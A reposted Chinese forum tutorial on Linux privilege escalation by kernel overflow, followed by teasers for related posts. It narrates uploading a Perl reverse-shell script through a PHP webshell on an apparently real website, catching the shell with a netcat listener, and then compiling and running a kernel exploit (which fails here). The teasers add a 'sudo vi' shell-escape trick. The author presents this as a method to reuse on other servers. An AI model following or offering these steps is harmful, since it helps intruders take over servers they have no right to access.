linux溢出提权(适合刚学习linux提权的朋友)

转载 2012年03月31日 13:06:19
本帖最后由 wjs 于 2010-4-3 14:26 编辑 

作者wjs
qq 825680101

我也是刚接触linux,谢谢师傅sunwear的指导。
先在网站目录上传1.pl,是个反弹脚本
Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0

然后执行 ./1.pl 本机IP 1224

然后本机监听nc -vv -l -p 1224,图1 反弹成功

输入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
这里uid=529(zeicom)还不是root权限,输入uname –r
返回:2.6.18-164.11.1.el5PAE

找对应的exp, 这里地址整理很齐全可以这里下
http://sebug.net/paper/linux_exp/ {此处经本人更改}

命令输入pwd,这个命令是显示当前目录,当前目录就是shell的目录,我在shell上传2.c
然后命令输入
Gcc –o 2 2.c  //把2.c编译成可执行文件
chmod +x 2 //给2有执行权限
./2 //执行2,2是溢出的 exp文件。图2
  

看图可以发现没提权成功,过程就是这样。以后遇到linux可以这样提权。不会linux提权的朋友可以学习下,会有所收获的 

常见的服务器溢出提权方法

0×00 前言 0×01 找可写目录 0×02 运行exploit提权 0×03 附录 0×00 前言 溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来. 而相对计...
  • xysoul
  • xysoul
  • 2015年03月20日 09:26
  • 2303

linux溢出提权(适合刚学习linux提权的朋友)

本帖最后由 wjs 于 2010-4-3 14:26 编辑  作者wjs qq 825680101 我也是刚接触linux,谢谢师傅sunwear的指导。 先在网站目录上传1.pl,是...
  • fengling132
  • fengling132
  • 2012年03月31日 13:06
  • 1405

搜集的linux root自动溢出root,pl工具,全自动溢出提权pl

  • 2013年12月02日 15:05
  • 3KB
  • 下载

Linux提权:从入门到放弃

转自:http://www.freebuf.com/articles/system/129549.html *原创作者:piece of the past,本文属Freebuf原创奖励计划,...
  • earbao
  • earbao
  • 2017年03月23日 09:25
  • 4546

精点攻防 溢出提权攻击的解决办法

在恶意用户频频攻击、系统漏洞层出不穷的今天,作为网络管理员、系统管理员虽然在服务器的安全上都下了不少功夫,诸如及时打上系统安全补丁、进行一些常规的安全配置,但有时仍不安全。因此必须恶意用户入侵之前,通...
  • kzh4435
  • kzh4435
  • 2007年10月15日 13:25
  • 312

简单的linux提权收集的N多linux内核exp

  • 2013年03月12日 09:48
  • 2.88MB
  • 下载

linux sudo提权

对于可以sudo的用户,就可以获得root权限,具体方法如下: 1.sudo vi 提权 sudo vi filename 在vi的命令行输入:!sh 进入shell 使用id查看,发现是r...
  • lineuman
  • lineuman
  • 2016年11月09日 20:07
  • 1317

实战Linux下三种不同方式的提权技巧

介绍在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhu...
  • yaofeiNO1
  • yaofeiNO1
  • 2017年03月17日 20:04
  • 2054

Linux系统提权思路

渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版...
  • bnxf00000
  • bnxf00000
  • 2017年03月22日 11:22
  • 4958

linux 本地提权exp网址集合

最近在提一个debian 64位的服务器,内核版本比较特殊,一直没提下来。其它方法又不太会,于是google和问兄弟们了一些exp的网址,这里做个记录吧,方便以后查阅。 http://www.exp...
  • god_7z1
  • god_7z1
  • 2013年06月24日 00:20
  • 1605
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:linux溢出提权(适合刚学习linux提权的朋友)
举报原因:
原因补充:

(最多只允许输入30个字)